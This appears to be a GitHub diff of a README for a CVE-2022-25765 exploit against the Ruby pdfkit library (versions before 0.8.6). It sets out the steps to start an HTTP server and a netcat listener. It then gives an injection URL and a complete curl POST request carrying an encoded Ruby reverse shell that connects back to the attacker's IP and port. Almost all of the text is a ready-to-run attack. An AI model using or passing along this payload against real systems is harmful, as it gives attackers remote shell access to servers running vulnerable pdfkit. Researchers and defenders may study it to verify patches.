STRLCPY/CVE-2022-25765-pdfkit

Total 1 files

■ ■ ■ ■ ■ ■

README.md

		skipped 1 lines
2	2		pdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765
3	3
4	4		Pre-reqs:
5		-	1. Setup HTTP Server - "python3 -m http.server"
6		-	2. Setup Netcat Listener - "nc -lvnp 4444"
	5	+	1. Setup HTTP Server - <i>python3 -m http.server</i>
	6	+	2. Setup Netcat Listener - <i>nc -lvnp 4444</i>
7	7
	8	+	Reverse Ruby Shell via webpage:
	9	+	<i>http://LOCAL-IP:LOCAL-HTTP-PORT/?name=%20` ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("LOCAL-IP",LOCAL-LISTEN-PORT))')</i>
	10	+
	11	+
	12	+	Via CURL (modify <b>bold</b> values):
	13	+	<i>curl '<b>TARGET-URL</b>' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: <b>TARGET_URL</b>' -H 'Connection: keep-alive' -H 'Referer: <b>TARGET_URL</b>' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2F<b>LOCAL-IP</b>%3A<b>LOCAL-HTTP-PORT</b>%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22<b>LOCAL-IP</b>%22%2C<b>LOCAL-LISTEN-PORT</b>%29%29%27%60'</i>
8	14